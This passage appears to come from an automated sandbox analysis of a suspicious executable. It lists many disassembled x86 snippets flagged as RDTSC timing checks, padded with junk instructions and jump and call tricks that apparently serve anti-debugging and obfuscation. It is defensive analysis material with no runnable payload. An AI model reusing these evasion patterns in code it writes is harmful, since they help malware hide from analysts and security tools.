                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7787 second address: 7A779C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnp 00007F6C6956DA50h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A779C second address: 7A77D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jbe 00007F6C698AAEEAh 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jne 00007F6C698AAEF2h 0x0000001b pop eax 0x0000001c clc 0x0000001d lea ebx, dword ptr [ebp+124494FEh] 0x00000023 cld 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 jc 00007F6C698AAEE6h 0x0000002e pop eax 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77D7 second address: 7A77E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C6956DA48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77E9 second address: 7A77EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77EF second address: 7A77F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77F4 second address: 7A77FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77FA second address: 7A77FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7831 second address: 7A7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7835 second address: 7A787C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, 2352h 0x00000011 push 00000000h 0x00000013 mov dx, si 0x00000016 call 00007F6C6956DA49h 0x0000001b jmp 00007F6C6956DA4Fh 0x00000020 push eax 0x00000021 push eax 0x00000022 push esi 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop esi 0x00000026 pop eax 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b pushad 0x0000002c jnl 00007F6C6956DA4Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A787C second address: 7A789D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF1h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnp 00007F6C698AAEEEh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A789D second address: 7A78BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6C6956DA54h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A78BC second address: 7A7919 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C698AAEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jno 00007F6C698AAEF0h 0x00000011 push 00000003h 0x00000013 mov ecx, 26A2EADAh 0x00000018 push 00000000h 0x0000001a mov ecx, dword ptr [ebp+122D36BFh] 0x00000020 mov edi, dword ptr [ebp+122D38F7h] 0x00000026 push 00000003h 0x00000028 mov dx, 0F13h 0x0000002c push 8919C29Bh 0x00000031 pushad 0x00000032 jmp 00007F6C698AAEF6h 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7A87 second address: 7A7A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7A8C second address: 7A7B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C698AAEE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jbe 00007F6C698AAEF9h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F6C698AAEEFh 0x0000001f popad 0x00000020 pop eax 0x00000021 add ecx, dword ptr [ebp+122D385Fh] 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F6C698AAEE8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 sub dx, E65Ah 0x00000048 push 00000000h 0x0000004a pushad 0x0000004b je 00007F6C698AAEECh 0x00000051 jns 00007F6C698AAEE6h 0x00000057 je 00007F6C698AAEE8h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 push 00000003h 0x00000062 call 00007F6C698AAEEEh 0x00000067 sub si, D795h 0x0000006c pop esi 0x0000006d call 00007F6C698AAEE9h 0x00000072 jmp 00007F6C698AAEF9h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push edx 0x0000007b jmp 00007F6C698AAEF0h 0x00000080 pop edx 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7B4D second address: 7A7B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007F6C6956DA4Bh 0x00000013 push eax 0x00000014 jmp 00007F6C6956DA4Ch 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e jl 00007F6C6956DA4Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B849D second address: 7B84A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C77FD second address: 7C780F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F6C6956DA46h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C579B second address: 7C57A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5949 second address: 7C5953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C6956DA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5953 second address: 7C5985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6C698AAEF9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5985 second address: 7C598A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C598A second address: 7C5997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F6C698AAEF2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5BF6 second address: 7C5BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5BFB second address: 7C5C06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5C06 second address: 7C5C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5D4D second address: 7C5D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F6C698AAEE6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F6C698AAEE6h 0x00000016 jnl 00007F6C698AAEE6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C61BD second address: 7C61D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6C6956DA4Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6314 second address: 7C631D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6460 second address: 7C6472 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6C6956DA4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C65F1 second address: 7C6612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6612 second address: 7C6617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6A25 second address: 7C6A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7116 second address: 7C711A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C711A second address: 7C7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007F6C698AAEE6h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C73AC second address: 7C73B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDD48 second address: 7CDD4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDD4E second address: 7CDD61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F6C6956DA48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCCC2 second address: 7CCCCC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCCCC second address: 7CCCE5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C6956DA48h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6C6956DA4Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE595 second address: 7CE59B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE59B second address: 7CE59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE59F second address: 7CE5B4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B31 second address: 7D1B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jnc 00007F6C6956DA46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B3F second address: 7D1B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B44 second address: 7D1B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B4C second address: 7D1B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B50 second address: 7D1B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA50h 0x00000007 jmp 00007F6C6956DA50h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6C6956DA51h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E64 second address: 7D1E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F6C698AAEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E70 second address: 7D1E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D574B second address: 7D574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D574F second address: 7D5755 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5755 second address: 7D5772 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C698AAEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F6C698AAEE8h 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D65C4 second address: 7D65C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D687D second address: 7D6883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6883 second address: 7D68AD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C6956DA5Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F6C6956DA46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D68AD second address: 7D68B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D68B3 second address: 7D68BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6C6956DA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D69A9 second address: 7D69AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7762 second address: 7D7766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D990E second address: 7D9914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAFBB second address: 7DAFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6C6956DA4Eh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C69E second address: 78C6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C6A4 second address: 78C6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB610 second address: 7DB616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC230 second address: 7DC29E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F6C6956DA48h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call 00007F6C6956DA4Bh 0x0000002a pop esi 0x0000002b push 00000000h 0x0000002d or dword ptr [ebp+122D1987h], edx 0x00000033 push 00000000h 0x00000035 mov si, cx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jbe 00007F6C6956DA46h 0x00000042 jmp 00007F6C6956DA4Bh 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBFD6 second address: 7DBFE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0CE second address: 7DE0D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB28 second address: 7DEB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DDEE6 second address: 7DDEFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C6956DA4Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB44 second address: 7DEB49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB49 second address: 7DEB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jg 00007F6C6956DA46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB5B second address: 7DEB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB65 second address: 7DEBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push edi 0x00000008 mov dword ptr [ebp+122D2175h], ebx 0x0000000e pop esi 0x0000000f mov dword ptr [ebp+122D2175h], esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F6C6956DA48h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F6C6956DA48h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d call 00007F6C6956DA53h 0x00000052 mov dword ptr [ebp+122D2671h], edx 0x00000058 pop esi 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b jmp 00007F6C6956DA51h 0x00000060 pushad 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBF2 second address: 7DEC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a js 00007F6C698AAEE6h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEC03 second address: 7DEC08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E279D second address: 7E27A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3D37 second address: 7E3DB0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F6C6956DA48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 call 00007F6C6956DA51h 0x0000002a jl 00007F6C6956DA4Ch 0x00000030 ja 00007F6C6956DA46h 0x00000036 pop edi 0x00000037 jmp 00007F6C6956DA4Ah 0x0000003c push 00000000h 0x0000003e and bx, C62Ah 0x00000043 push 00000000h 0x00000045 mov di, 2334h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F6C6956DA53h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2FB3 second address: 7E2FBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3F7E second address: 7E3F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3F83 second address: 7E400C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C698AAEE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F6C698AAEE8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, 02533C02h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov bx, 4124h 0x0000003c mov eax, dword ptr [ebp+122D0339h] 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F6C698AAEE8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c push FFFFFFFFh 0x0000005e cld 0x0000005f nop 0x00000060 jmp 